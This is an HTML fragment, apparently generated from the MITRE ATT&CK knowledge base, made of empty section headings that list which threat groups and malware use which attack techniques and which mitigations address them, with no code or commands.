<div class="sect2">
<h3 id="_rtm_s0148_uses_screen_capture_t1113"><a class="anchor" href="#_rtm_s0148_uses_screen_capture_t1113"></a><a class="link" href="#_rtm_s0148_uses_screen_capture_t1113">RTM (S0148) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_connection_proxy_mitigation_t1090_mitigates_connection_proxy_t1090"><a class="anchor" href="#_connection_proxy_mitigation_t1090_mitigates_connection_proxy_t1090"></a><a class="link" href="#_connection_proxy_mitigation_t1090_mitigates_connection_proxy_t1090">Connection Proxy Mitigation (T1090) mitigates Connection Proxy (T1090)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_poisonivy_s0012"><a class="anchor" href="#_menupass_g0045_uses_poisonivy_s0012"></a><a class="link" href="#_menupass_g0045_uses_poisonivy_s0012">menuPass (G0045) uses PoisonIvy (S0012)</a></h3>
</div>
<div class="sect2">
<h3 id="_ke3chang_g0004_uses_exfiltration_over_command_and_control_channel_t1041"><a class="anchor" href="#_ke3chang_g0004_uses_exfiltration_over_command_and_control_channel_t1041"></a><a class="link" href="#_ke3chang_g0004_uses_exfiltration_over_command_and_control_channel_t1041">Ke3chang (G0004) uses Exfiltration Over Command and Control Channel (T1041)</a></h3>
</div>
<div class="sect2">
<h3 id="_patchwork_g0040_uses_masquerading_t1036"><a class="anchor" href="#_patchwork_g0040_uses_masquerading_t1036"></a><a class="link" href="#_patchwork_g0040_uses_masquerading_t1036">Patchwork (G0040) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_strider_g0041_uses_connection_proxy_t1090"><a class="anchor" href="#_strider_g0041_uses_connection_proxy_t1090"></a><a class="link" href="#_strider_g0041_uses_connection_proxy_t1090">Strider (G0041) uses Connection Proxy (T1090)</a></h3>
</div>
<div class="sect2">
<h3 id="_seaduke_s0053_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_seaduke_s0053_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_seaduke_s0053_uses_standard_cryptographic_protocol_t1032">SeaDuke (S0053) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_redleaves_s0153"><a class="anchor" href="#_menupass_g0045_uses_redleaves_s0153"></a><a class="link" href="#_menupass_g0045_uses_redleaves_s0153">menuPass (G0045) uses RedLeaves (S0153)</a></h3>
</div>
<div class="sect2">
<h3 id="_felismus_s0171_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_felismus_s0171_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_felismus_s0171_uses_system_network_configuration_discovery_t1016">Felismus (S0171) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_admin_338_g0018_uses_systeminfo_s0096"><a class="anchor" href="#_admin_338_g0018_uses_systeminfo_s0096"></a><a class="link" href="#_admin_338_g0018_uses_systeminfo_s0096">admin@338 (G0018) uses Systeminfo (S0096)</a></h3>
</div>
<div class="sect2">
<h3 id="_regin_s0019_uses_code_signing_t1116"><a class="anchor" href="#_regin_s0019_uses_code_signing_t1116"></a><a class="link" href="#_regin_s0019_uses_code_signing_t1116">Regin (S0019) uses Code Signing (T1116)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_system_information_discovery_t1082"><a class="anchor" href="#_rtm_s0148_uses_system_information_discovery_t1082"></a><a class="link" href="#_rtm_s0148_uses_system_information_discovery_t1082">RTM (S0148) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_isminjector_s0189_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_isminjector_s0189_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_isminjector_s0189_uses_obfuscated_files_or_information_t1027">ISMInjector (S0189) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_axiom_g0001_uses_remote_desktop_protocol_t1076"><a class="anchor" href="#_axiom_g0001_uses_remote_desktop_protocol_t1076"></a><a class="link" href="#_axiom_g0001_uses_remote_desktop_protocol_t1076">Axiom (G0001) uses Remote Desktop Protocol (T1076)</a></h3>
</div>
<div class="sect2">
<h3 id="_naikon_g0019_uses_systeminfo_s0096"><a class="anchor" href="#_naikon_g0019_uses_systeminfo_s0096"></a><a class="link" href="#_naikon_g0019_uses_systeminfo_s0096">Naikon (G0019) uses Systeminfo (S0096)</a></h3>
</div>
<div class="sect2">
<h3 id="_login_item_mitigation_t1162_mitigates_login_item_t1162"><a class="anchor" href="#_login_item_mitigation_t1162_mitigates_login_item_t1162"></a><a class="link" href="#_login_item_mitigation_t1162_mitigates_login_item_t1162">Login Item Mitigation (T1162) mitigates Login Item (T1162)</a></h3>
</div>
<div class="sect2">
<h3 id="_system_service_discovery_mitigation_t1007_mitigates_system_service_discovery_t1007"><a class="anchor" href="#_system_service_discovery_mitigation_t1007_mitigates_system_service_discovery_t1007"></a><a class="link" href="#_system_service_discovery_mitigation_t1007_mitigates_system_service_discovery_t1007">System Service Discovery Mitigation (T1007) mitigates System Service Discovery (T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_new_service_t1050"><a class="anchor" href="#_cobalt_strike_s0154_uses_new_service_t1050"></a><a class="link" href="#_cobalt_strike_s0154_uses_new_service_t1050">Cobalt Strike (S0154) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_chches_s0144_uses_code_signing_t1116"><a class="anchor" href="#_chches_s0144_uses_code_signing_t1116"></a><a class="link" href="#_chches_s0144_uses_code_signing_t1116">ChChes (S0144) uses Code Signing (T1116)</a></h3>
</div>
<div class="sect2">
<h3 id="_trojan_karagany_s0094_uses_software_packing_t1045"><a class="anchor" href="#_trojan_karagany_s0094_uses_software_packing_t1045"></a><a class="link" href="#_trojan_karagany_s0094_uses_software_packing_t1045">Trojan.Karagany (S0094) uses Software Packing (T1045)</a></h3>
</div>
<div class="sect2">
<h3 id="_badnews_s0128_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_badnews_s0128_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_badnews_s0128_uses_registry_run_keys_start_folder_t1060">BADNEWS (S0128) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_windows_remote_management_t1028"><a class="anchor" href="#_cobalt_strike_s0154_uses_windows_remote_management_t1028"></a><a class="link" href="#_cobalt_strike_s0154_uses_windows_remote_management_t1028">Cobalt Strike (S0154) uses Windows Remote Management (T1028)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_windows_admin_shares_t1077"><a class="anchor" href="#_duqu_s0038_uses_windows_admin_shares_t1077"></a><a class="link" href="#_duqu_s0038_uses_windows_admin_shares_t1077">Duqu (S0038) uses Windows Admin Shares (T1077)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_rtm_s0148_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_rtm_s0148_uses_file_and_directory_discovery_t1083">RTM (S0148) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_poseidon_group_g0033_uses_credential_dumping_t1003"><a class="anchor" href="#_poseidon_group_g0033_uses_credential_dumping_t1003"></a><a class="link" href="#_poseidon_group_g0033_uses_credential_dumping_t1003">Poseidon Group (G0033) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_ke3chang_g0004_uses_permission_groups_discovery_t1069"><a class="anchor" href="#_ke3chang_g0004_uses_permission_groups_discovery_t1069"></a><a class="link" href="#_ke3chang_g0004_uses_permission_groups_discovery_t1069">Ke3chang (G0004) uses Permission Groups Discovery (T1069)</a></h3>
</div>
<div class="sect2">
<h3 id="_hdoor_s0061_uses_disabling_security_tools_t1089"><a class="anchor" href="#_hdoor_s0061_uses_disabling_security_tools_t1089"></a><a class="link" href="#_hdoor_s0061_uses_disabling_security_tools_t1089">HDoor (S0061) uses Disabling Security Tools (T1089)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_remote_system_discovery_t1018"><a class="anchor" href="#_menupass_g0045_uses_remote_system_discovery_t1018"></a><a class="link" href="#_menupass_g0045_uses_remote_system_discovery_t1018">menuPass (G0045) uses Remote System Discovery (T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_lslsass_s0121"><a class="anchor" href="#_apt1_g0006_uses_lslsass_s0121"></a><a class="link" href="#_apt1_g0006_uses_lslsass_s0121">APT1 (G0006) uses Lslsass (S0121)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_credentials_in_files_t1081"><a class="anchor" href="#_apt3_g0022_uses_credentials_in_files_t1081"></a><a class="link" href="#_apt3_g0022_uses_credentials_in_files_t1081">APT3 (G0022) uses Credentials in Files (T1081)</a></h3>
</div>
<div class="sect2">
<h3 id="_streamex_s0142_uses_command_line_interface_t1059"><a class="anchor" href="#_streamex_s0142_uses_command_line_interface_t1059"></a><a class="link" href="#_streamex_s0142_uses_command_line_interface_t1059">StreamEx (S0142) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_zeroaccess_s0027_uses_ntfs_extended_attributes_t1096"><a class="anchor" href="#_zeroaccess_s0027_uses_ntfs_extended_attributes_t1096"></a><a class="link" href="#_zeroaccess_s0027_uses_ntfs_extended_attributes_t1096">Zeroaccess (S0027) uses NTFS Extended Attributes (T1096)</a></h3>
</div>
<div class="sect2">
<h3 id="_backdoor_oldrea_s0093_uses_credential_dumping_t1003"><a class="anchor" href="#_backdoor_oldrea_s0093_uses_credential_dumping_t1003"></a><a class="link" href="#_backdoor_oldrea_s0093_uses_credential_dumping_t1003">Backdoor.Oldrea (S0093) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_scheduled_task_t1053"><a class="anchor" href="#_dragonfly_g0035_uses_scheduled_task_t1053"></a><a class="link" href="#_dragonfly_g0035_uses_scheduled_task_t1053">Dragonfly (G0035) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_h1n1_s0132_uses_taint_shared_content_t1080"><a class="anchor" href="#_h1n1_s0132_uses_taint_shared_content_t1080"></a><a class="link" href="#_h1n1_s0132_uses_taint_shared_content_t1080">H1N1 (S0132) uses Taint Shared Content (T1080)</a></h3>
</div>
<div class="sect2">
<h3 id="_elmer_s0064_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_elmer_s0064_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_elmer_s0064_uses_file_and_directory_discovery_t1083">ELMER (S0064) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_deobfuscate_decode_files_or_information_t1140"><a class="anchor" href="#_bronze_butler_g0060_uses_deobfuscate_decode_files_or_information_t1140"></a><a class="link" href="#_bronze_butler_g0060_uses_deobfuscate_decode_files_or_information_t1140">BRONZE BUTLER (G0060) uses Deobfuscate/Decode Files or Information (T1140)</a></h3>
</div>
<div class="sect2">
<h3 id="_rawpos_s0169_uses_masquerading_t1036"><a class="anchor" href="#_rawpos_s0169_uses_masquerading_t1036"></a><a class="link" href="#_rawpos_s0169_uses_masquerading_t1036">RawPOS (S0169) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_cozycar_s0046_uses_security_software_discovery_t1063"><a class="anchor" href="#_cozycar_s0046_uses_security_software_discovery_t1063"></a><a class="link" href="#_cozycar_s0046_uses_security_software_discovery_t1063">CozyCar (S0046) uses Security Software Discovery (T1063)</a></h3>
</div>
<div class="sect2">
<h3 id="_3para_rat_s0066_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_3para_rat_s0066_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_3para_rat_s0066_uses_standard_cryptographic_protocol_t1032">3PARA RAT (S0066) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_elise_s0081_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_elise_s0081_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_elise_s0081_uses_file_and_directory_discovery_t1083">Elise (S0081) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_shortcut_modification_t1023"><a class="anchor" href="#_blackenergy_s0089_uses_shortcut_modification_t1023"></a><a class="link" href="#_blackenergy_s0089_uses_shortcut_modification_t1023">BlackEnergy (S0089) uses Shortcut Modification (T1023)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_input_capture_t1056"><a class="anchor" href="#_remsec_s0125_uses_input_capture_t1056"></a><a class="link" href="#_remsec_s0125_uses_input_capture_t1056">Remsec (S0125) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_query_registry_t1012"><a class="anchor" href="#_advstoreshell_s0045_uses_query_registry_t1012"></a><a class="link" href="#_advstoreshell_s0045_uses_query_registry_t1012">ADVSTORESHELL (S0045) uses Query Registry (T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_emissary_s0082_uses_rundll32_t1085"><a class="anchor" href="#_emissary_s0082_uses_rundll32_t1085"></a><a class="link" href="#_emissary_s0082_uses_rundll32_t1085">Emissary (S0082) uses Rundll32 (T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_data_from_network_shared_drive_t1039"><a class="anchor" href="#_menupass_g0045_uses_data_from_network_shared_drive_t1039"></a><a class="link" href="#_menupass_g0045_uses_data_from_network_shared_drive_t1039">menuPass (G0045) uses Data from Network Shared Drive (T1039)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_remotecmd_s0166"><a class="anchor" href="#_apt3_g0022_uses_remotecmd_s0166"></a><a class="link" href="#_apt3_g0022_uses_remotecmd_s0166">APT3 (G0022) uses RemoteCMD (S0166)</a></h3>
</div>
<div class="sect2">
<h3 id="_nettraveler_s0033_uses_input_capture_t1056"><a class="anchor" href="#_nettraveler_s0033_uses_input_capture_t1056"></a><a class="link" href="#_nettraveler_s0033_uses_input_capture_t1056">NetTraveler (S0033) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_service_registry_permissions_weakness_mitigation_t1058_mitigates_service_registry_permissions_weakness_t1058"><a class="anchor" href="#_service_registry_permissions_weakness_mitigation_t1058_mitigates_service_registry_permissions_weakness_t1058"></a><a class="link" href="#_service_registry_permissions_weakness_mitigation_t1058_mitigates_service_registry_permissions_weakness_t1058">Service Registry Permissions Weakness Mitigation (T1058) mitigates Service Registry Permissions Weakness (T1058)</a></h3>
</div>
<div class="sect2">
<h3 id="_stealth_falcon_g0038_uses_data_from_local_system_t1005"><a class="anchor" href="#_stealth_falcon_g0038_uses_data_from_local_system_t1005"></a><a class="link" href="#_stealth_falcon_g0038_uses_data_from_local_system_t1005">Stealth Falcon (G0038) uses Data from Local System (T1005)</a></h3>
</div>
<div class="sect2">
<h3 id="_tinyzbot_s0004_uses_new_service_t1050"><a class="anchor" href="#_tinyzbot_s0004_uses_new_service_t1050"></a><a class="link" href="#_tinyzbot_s0004_uses_new_service_t1050">TinyZBot (S0004) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_pinchduke_s0048_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_pinchduke_s0048_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_pinchduke_s0048_uses_file_and_directory_discovery_t1083">PinchDuke (S0048) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_kasidet_s0088_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_kasidet_s0088_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_kasidet_s0088_uses_registry_run_keys_start_folder_t1060">Kasidet (S0088) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_halfbaked_s0151_uses_file_deletion_t1107"><a class="anchor" href="#_halfbaked_s0151_uses_file_deletion_t1107"></a><a class="link" href="#_halfbaked_s0151_uses_file_deletion_t1107">HALFBAKED (S0151) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_dust_storm_g0031_uses_mis_type_s0084"><a class="anchor" href="#_dust_storm_g0031_uses_mis_type_s0084"></a><a class="link" href="#_dust_storm_g0031_uses_mis_type_s0084">Dust Storm (G0031) uses Mis-Type (S0084)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_credential_dumping_t1003"><a class="anchor" href="#_remsec_s0125_uses_credential_dumping_t1003"></a><a class="link" href="#_remsec_s0125_uses_credential_dumping_t1003">Remsec (S0125) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_at_s0110"><a class="anchor" href="#_bronze_butler_g0060_uses_at_s0110"></a><a class="link" href="#_bronze_butler_g0060_uses_at_s0110">BRONZE BUTLER (G0060) uses at (S0110)</a></h3>
</div>
<div class="sect2">
<h3 id="_elise_s0081_uses_masquerading_t1036"><a class="anchor" href="#_elise_s0081_uses_masquerading_t1036"></a><a class="link" href="#_elise_s0081_uses_masquerading_t1036">Elise (S0081) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin6_g0037_uses_automated_collection_t1119"><a class="anchor" href="#_fin6_g0037_uses_automated_collection_t1119"></a><a class="link" href="#_fin6_g0037_uses_automated_collection_t1119">FIN6 (G0037) uses Automated Collection (T1119)</a></h3>
</div>
<div class="sect2">
<h3 id="_elise_s0081_uses_data_encoding_t1132"><a class="anchor" href="#_elise_s0081_uses_data_encoding_t1132"></a><a class="link" href="#_elise_s0081_uses_data_encoding_t1132">Elise (S0081) uses Data Encoding (T1132)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt18_g0026_uses_file_deletion_t1107"><a class="anchor" href="#_apt18_g0026_uses_file_deletion_t1107"></a><a class="link" href="#_apt18_g0026_uses_file_deletion_t1107">APT18 (G0026) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_hi_zor_s0087_uses_remote_file_copy_t1105"><a class="anchor" href="#_hi_zor_s0087_uses_remote_file_copy_t1105"></a><a class="link" href="#_hi_zor_s0087_uses_remote_file_copy_t1105">Hi-Zor (S0087) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_scheduled_task_t1053"><a class="anchor" href="#_bronze_butler_g0060_uses_scheduled_task_t1053"></a><a class="link" href="#_bronze_butler_g0060_uses_scheduled_task_t1053">BRONZE BUTLER (G0060) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_mis_type_s0084_uses_account_discovery_t1087"><a class="anchor" href="#_mis_type_s0084_uses_account_discovery_t1087"></a><a class="link" href="#_mis_type_s0084_uses_account_discovery_t1087">Mis-Type (S0084) uses Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_dll_side_loading_mitigation_t1073_mitigates_dll_side_loading_t1073"><a class="anchor" href="#_dll_side_loading_mitigation_t1073_mitigates_dll_side_loading_t1073"></a><a class="link" href="#_dll_side_loading_mitigation_t1073_mitigates_dll_side_loading_t1073">DLL Side-Loading Mitigation (T1073) mitigates DLL Side-Loading (T1073)</a></h3>
</div>
<div class="sect2">
<h3 id="_rarstone_s0055_uses_remote_file_copy_t1105"><a class="anchor" href="#_rarstone_s0055_uses_remote_file_copy_t1105"></a><a class="link" href="#_rarstone_s0055_uses_remote_file_copy_t1105">RARSTONE (S0055) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_emissary_s0082_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_emissary_s0082_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_emissary_s0082_uses_custom_cryptographic_protocol_t1024">Emissary (S0082) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_remote_desktop_protocol_t1076"><a class="anchor" href="#_oilrig_g0049_uses_remote_desktop_protocol_t1076"></a><a class="link" href="#_oilrig_g0049_uses_remote_desktop_protocol_t1076">OilRig (G0049) uses Remote Desktop Protocol (T1076)</a></h3>
</div>
<div class="sect2">
<h3 id="_gatekeeper_bypass_mitigation_t1144_mitigates_gatekeeper_bypass_t1144"><a class="anchor" href="#_gatekeeper_bypass_mitigation_t1144_mitigates_gatekeeper_bypass_t1144"></a><a class="link" href="#_gatekeeper_bypass_mitigation_t1144_mitigates_gatekeeper_bypass_t1144">Gatekeeper Bypass Mitigation (T1144) mitigates Gatekeeper Bypass (T1144)</a></h3>
</div>
<div class="sect2">
<h3 id="_sid_history_injection_mitigation_t1178_mitigates_sid_history_injection_t1178"><a class="anchor" href="#_sid_history_injection_mitigation_t1178_mitigates_sid_history_injection_t1178"></a><a class="link" href="#_sid_history_injection_mitigation_t1178_mitigates_sid_history_injection_t1178">SID-History Injection Mitigation (T1178) mitigates SID-History Injection (T1178)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_system_time_discovery_t1124"><a class="anchor" href="#_bronze_butler_g0060_uses_system_time_discovery_t1124"></a><a class="link" href="#_bronze_butler_g0060_uses_system_time_discovery_t1124">BRONZE BUTLER (G0060) uses System Time Discovery (T1124)</a></h3>
</div>
<div class="sect2">
<h3 id="_daserf_s0187_uses_input_capture_t1056"><a class="anchor" href="#_daserf_s0187_uses_input_capture_t1056"></a><a class="link" href="#_daserf_s0187_uses_input_capture_t1056">Daserf (S0187) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_automated_collection_t1119"><a class="anchor" href="#_rtm_s0148_uses_automated_collection_t1119"></a><a class="link" href="#_rtm_s0148_uses_automated_collection_t1119">RTM (S0148) uses Automated Collection (T1119)</a></h3>
</div>
<div class="sect2">
<h3 id="_unknown_logger_s0130_uses_input_capture_t1056"><a class="anchor" href="#_unknown_logger_s0130_uses_input_capture_t1056"></a><a class="link" href="#_unknown_logger_s0130_uses_input_capture_t1056">Unknown Logger (S0130) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_zlib_s0086_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_zlib_s0086_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_zlib_s0086_uses_standard_application_layer_protocol_t1071">ZLib (S0086) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_mis_type_s0084_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_mis_type_s0084_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_mis_type_s0084_uses_system_network_configuration_discovery_t1016">Mis-Type (S0084) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin7_g0046_uses_powersource_s0145"><a class="anchor" href="#_fin7_g0046_uses_powersource_s0145"></a><a class="link" href="#_fin7_g0046_uses_powersource_s0145">FIN7 (G0046) uses POWERSOURCE (S0145)</a></h3>
</div>
<div class="sect2">
<h3 id="_naikon_g0019_uses_psexec_s0029"><a class="anchor" href="#_naikon_g0019_uses_psexec_s0029"></a><a class="link" href="#_naikon_g0019_uses_psexec_s0029">Naikon (G0019) uses PsExec (S0029)</a></h3>
</div>
<div class="sect2">
<h3 id="_badnews_s0128_uses_screen_capture_t1113"><a class="anchor" href="#_badnews_s0128_uses_screen_capture_t1113"></a><a class="link" href="#_badnews_s0128_uses_screen_capture_t1113">BADNEWS (S0128) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_flashflood_s0036_uses_data_from_local_system_t1005"><a class="anchor" href="#_flashflood_s0036_uses_data_from_local_system_t1005"></a><a class="link" href="#_flashflood_s0036_uses_data_from_local_system_t1005">FLASHFLOOD (S0036) uses Data from Local System (T1005)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_dll_side_loading_t1073"><a class="anchor" href="#_threat_group_3390_g0027_uses_dll_side_loading_t1073"></a><a class="link" href="#_threat_group_3390_g0027_uses_dll_side_loading_t1073">Threat Group-3390 (G0027) uses DLL Side-Loading (T1073)</a></h3>
</div>
<div class="sect2">
<h3 id="_plugx_s0013_uses_new_service_t1050"><a class="anchor" href="#_plugx_s0013_uses_new_service_t1050"></a><a class="link" href="#_plugx_s0013_uses_new_service_t1050">PlugX (S0013) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_new_service_mitigation_t1050_mitigates_new_service_t1050"><a class="anchor" href="#_new_service_mitigation_t1050_mitigates_new_service_t1050"></a><a class="link" href="#_new_service_mitigation_t1050_mitigates_new_service_t1050">New Service Mitigation (T1050) mitigates New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_trojan_karagany_s0094_uses_data_staged_t1074"><a class="anchor" href="#_trojan_karagany_s0094_uses_data_staged_t1074"></a><a class="link" href="#_trojan_karagany_s0094_uses_data_staged_t1074">Trojan.Karagany (S0094) uses Data Staged (T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_powershell_t1086"><a class="anchor" href="#_oilrig_g0049_uses_powershell_t1086"></a><a class="link" href="#_oilrig_g0049_uses_powershell_t1086">OilRig (G0049) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_shipshape_s0028_uses_replication_through_removable_media_t1091"><a class="anchor" href="#_shipshape_s0028_uses_replication_through_removable_media_t1091"></a><a class="link" href="#_shipshape_s0028_uses_replication_through_removable_media_t1091">SHIPSHAPE (S0028) uses Replication Through Removable Media (T1091)</a></h3>
</div>
<div class="sect2">
<h3 id="_badnews_s0128_uses_data_from_local_system_t1005"><a class="anchor" href="#_badnews_s0128_uses_data_from_local_system_t1005"></a><a class="link" href="#_badnews_s0128_uses_data_from_local_system_t1005">BADNEWS (S0128) uses Data from Local System (T1005)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_data_encoding_t1132"><a class="anchor" href="#_bronze_butler_g0060_uses_data_encoding_t1132"></a><a class="link" href="#_bronze_butler_g0060_uses_data_encoding_t1132">BRONZE BUTLER (G0060) uses Data Encoding (T1132)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_plugx_s0013"><a class="anchor" href="#_apt3_g0022_uses_plugx_s0013"></a><a class="link" href="#_apt3_g0022_uses_plugx_s0013">APT3 (G0022) uses PlugX (S0013)</a></h3>
</div>
<div class="sect2">
<h3 id="_nbtstat_s0102_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_nbtstat_s0102_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_nbtstat_s0102_uses_system_network_configuration_discovery_t1016">nbtstat (S0102) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_bypass_user_account_control_t1088"><a class="anchor" href="#_rtm_s0148_uses_bypass_user_account_control_t1088"></a><a class="link" href="#_rtm_s0148_uses_bypass_user_account_control_t1088">RTM (S0148) uses Bypass User Account Control (T1088)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_system_information_discovery_t1082"><a class="anchor" href="#_turla_g0010_uses_system_information_discovery_t1082"></a><a class="link" href="#_turla_g0010_uses_system_information_discovery_t1082">Turla (G0010) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_unknown_logger_s0130_uses_system_information_discovery_t1082"><a class="anchor" href="#_unknown_logger_s0130_uses_system_information_discovery_t1082"></a><a class="link" href="#_unknown_logger_s0130_uses_system_information_discovery_t1082">Unknown Logger (S0130) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_downdelph_s0134_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_downdelph_s0134_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_downdelph_s0134_uses_standard_cryptographic_protocol_t1032">Downdelph (S0134) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_hammertoss_s0037_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_hammertoss_s0037_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_hammertoss_s0037_uses_standard_application_layer_protocol_t1071">HAMMERTOSS (S0037) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_misdat_s0083_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_misdat_s0083_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_misdat_s0083_uses_file_and_directory_discovery_t1083">Misdat (S0083) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_hdoor_s0061_uses_network_service_scanning_t1046"><a class="anchor" href="#_hdoor_s0061_uses_network_service_scanning_t1046"></a><a class="link" href="#_hdoor_s0061_uses_network_service_scanning_t1046">HDoor (S0061) uses Network Service Scanning (T1046)</a></h3>
</div>
<div class="sect2">
<h3 id="_net_s0039_uses_service_execution_t1035"><a class="anchor" href="#_net_s0039_uses_service_execution_t1035"></a><a class="link" href="#_net_s0039_uses_service_execution_t1035">Net (S0039) uses Service Execution (T1035)</a></h3>
</div>
<div class="sect2">
<h3 id="_ke3chang_g0004_uses_system_information_discovery_t1082"><a class="anchor" href="#_ke3chang_g0004_uses_system_information_discovery_t1082"></a><a class="link" href="#_ke3chang_g0004_uses_system_information_discovery_t1082">Ke3chang (G0004) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
